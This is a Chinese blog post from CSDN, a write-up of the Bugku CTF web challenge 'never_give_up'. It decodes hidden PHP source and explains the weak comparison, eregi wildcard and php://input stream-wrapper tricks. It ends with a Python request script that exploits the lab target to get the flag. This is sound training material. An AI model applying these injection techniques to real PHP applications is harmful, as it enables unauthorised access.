Bugku-never_give_up-ctf练习

最新推荐文章于 2024-05-21 21:44:07 发布
最新推荐文章于 2024-05-21 21:44:07 发布
阅读量1.1k 收藏 7
点赞数 2
分类专栏: python web ctf 文章标签: python 安全漏洞 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lshandel/article/details/118736402
版权
ctf 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
python
3 篇文章 0 订阅
订阅专栏
web
3 篇文章 0 订阅
订阅专栏

题目解析

题目知识点:php以及伪协议、正则、自己还用了py(因为mac上没装burp等 )、编码
个人感觉是挺难的,用的知识点不少
题目描述:作者:御结冰城
题目链接:https://ctf.bugku.com/challenges/detail/id/88.html?page=4

在这里插入图片描述

首先分析一波

打开网页之后得到,只有一行字在这里插入图片描述
说实话,结合url我以为是把id试出来 ,于是py写了个脚本,id从1到999试了一遍。。。由于过程缓慢,到三百多的时候,我决定先换个思路在这里插入图片描述
先看看源码吧,只有两行,但是给了提示说有1p.html文件在这里插入图片描述

然后破解一波

于是构建url:114.67.246.176:14183/1p.html,访问文件,发现回到了bugku首页,但是抓包过程中,发现有奇怪的东西出现了一下,就放弃用浏览器抓包,python写了一段爬虫

import requests
url='http://114.67.246.176:14183/1p.html'
head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
html=requests.get(url,headers=head).text
print(html)

得到

var Words ="%3Cscript%3Ewindow.location.href%3D’http%3A%2F%2Fwww.bugku.com’%3B%3C%2Fscript%3E%20%0A%3C!–JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF–%3E"

发现从第四行起是base64编码,解码得到

%22%3Bif(!%24_GET%5B’id’%5D)%0A%7B%0A%09header(‘Location%3A%20hello.php%3Fid%3D1’)%3B%0A%09exit()%3B%0A%7D%0A%24id%3D%24_GET%5B’id’%5D%3B%0A%24a%3D%24_GET%5B’a’%5D%3B%0A%24b%3D%24_GET%5B’b’%5D%3B%0Aif(stripos(%24a%2C’.’))%0A%7B%0A%09echo%20’no%20no%20no%20no%20no%20no%20no’%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20%40file_get_contents(%24a%2C’r’)%3B%0Aif(%24data%3D%3D%22bugku%20is%20a%20nice%20plateform!%22%20and%20%24id%3D%3D0%20and%20strlen(%24b)%3E5%20and%20eregi(%22111%22.substr(%24b%2C0%2C1)%2C%221114%22)%20and%20substr(%24b%2C0%2C1)!%3D4)%0A%7B%0A%09%24flag%20%3D%20%22flag%7B***********%7D%22%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20!!!%22%3B%0A%7D%0A%0A%0A%3F%3E

又发现是url编码,再次解码得到

if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	$flag = "flag{***********}"
}
else
{
	print "never never never give up !!!";
}

发现构造url需要三个参数a、b、id,要求分别如下:
a中不能含有.
id非空
b要满足’111’接上b的首个字符是’1114’的通配,并且首个字符不为’4’,并且长度大于5(这里用到了正则表达式的知识)
注意==是弱比较
不妨令 $b=*000000( * 是通配符 ) id=0dut2251
我们需要让data是’bugku is a nice plateform!'来获取flag
但是问题来了:

$data = @file_get_contents($a,'r');

这一行要把a作为一个文件的路径,将文件写给data,显然我们不能写出一个内容如此的文件

接着放一波技能

所以这里用伪协议 php:// 访问数据流,其中 php://input 可以访问原始请求数据中的只读流,让 变量a = “php://input”,然后在请求主体中提交字符串 bugku is a nice plateform!

接着通过py爬虫得到flag

import requests
url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000'
head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
data='bugku is a nice plateform!'
html=requests.post(url,headers=head,data=data).text
print(html)
青 霞
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
ctf web5 练习_CTF web题型总结 第六课 CTF WEB实战练习(二)
weixin_39636176的博客
12-20 1392
继上一篇总结:CTF web题型总结-第五课 CTF WEB实战练习(一)以下也是我在bugku练习的解题过程。以下内容大多是我在Bugku自己操作练习,有部分来源于网络,我只是在前人的基础上,对CET WEB进行一个总结;----------------------------------------------------------------------------------------...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1938
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
CTF解题-Bugku_Web_WriteUp (上)
道阻且长,行则将至。
08-16 8790
BugkuCTF平台是免费的CTF训练平台,题目数量多网上解析全面对新手入门友好。 为了划水“强网杯”练习一下,先从Web部分下手…… N0.1 Web2 1、访问靶场链接,花里胡哨: 2、入门题,直接查看搜索源码: 3、解决: No.2 计算器 额,这题……没啥好所说的,原先限制前端字段输入长度为1,修改前端字段长度的限制即可: No.3 Web$_GET 1、看看解题链接: 2、看到这没啥好说的……该提示的都提示了,直接获取 flag: No.4 Web$_POST 1、看看解题链接:
Bugku---web---never_give_up
最新发布
weixin_47450099的博客
05-21 1373
内有弱类型比较,通配符*,伪协议等概念
bugkuCTF-练习平台
qq_36676979的博客
03-08 5343
web 1.web2 这题查看源代码即可,火狐浏览器f12,查看器。 2.计算器 f12查看器,找到下面这行: <input type="text" class="input" maxlength="1"> 将maxlength改成位数比结果的的数,就可以输入了。 3.web基础$_GET 这个确实是基础,在get请求时,传入参数形式是在url后面加 ?参数=值。多个参数用 ?参...
BugkuCTF练习题解——Web一
qq_41739275的博客
08-24 5915
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
CTF-练习平台 writeup web
热门推荐
heySister
12-20 2万+
bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻…) 签到题 加群在公告里就可以看到flag值了。 Web2 F12,立马就看到flag的值了。 文件上传测试 题目说是...
CTF_WEB(习题)
若比邻的博客
12-15 5084
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
BugKu Web(21-25)
kid的博客
06-06 1937
BugKu Web(21-25) 前言 bugku刷题,本来想每10道写一篇的,但水平有限,发现到这里题目难度已经有点大了,所以每5道题整合一篇吧… 题目 秋名山老司机 登陆可以看到如上提示,然后快速刷新可以看到要求是post提交,键名为value 这肯定是人工没法完成的,必须写脚本 py脚本写起来的时候,没有用过eval函数,是真的痛苦,不断字符串处理,条件判断… 最后还不对,最后看...
CTF-练习平台 Web writeup By Assassin 暂时完结
qq_43679818的博客
11-13 4326
CTF-练习平台 Web writeup By Assassin 暂时完结
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTFd-master_roseosy_ctf_
09-30
"CTFd-master_roseosy_ctf_" 提供了一个完整的 CTF 平台实例,是 Roseosy 对 CTFd 的定制和实践版本,适合本地环境的部署,用于学习和扩展功能。 CTF 是一种流行的安全教育和竞技形式,参与者通过解决各种安全挑战...
KWA_Write-UP-CTF_Muhammad-Irsyad-Ali_05311840000041
03-18
Dokumentasi CTF-穆罕默德·伊尔萨德·阿里(Muhammad Irsyad Ali) 问题清单 UTCTF 2021 初学者 完整性检查1.说明您可以在#announcements频道的说明中找到该标志! 2.标志utflag {welcome_to_utctf}![替代文字]...
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
【标题】"i-SOON_CTF_2019:2019第二届安洵杯过渡环境"指的是2019年举办的第二届安洵杯网络安全竞赛中的一个环节,这个环节涉及到了过渡环境的设置与使用。CTF(Capture The Flag)是网络安全领域常见的竞赛形式,...
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
CTF-Solyd_2019
02-11
CTF-Solyd_2019】是2019年举办的一场网络安全竞赛,CTF(Capture The Flag)通常是指网络安全领域的比赛,参赛者通过解决一系列信息安全问题来获取分数,这些问题涵盖多种领域,如逆向工程、密码学、网络攻防等。...
java红酒网站源码-ctf_tools:ctf_tools
06-05
java网站源码CTF工具 卜拉欣·本·阿里比亚 | 2019 年 4 月 18 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值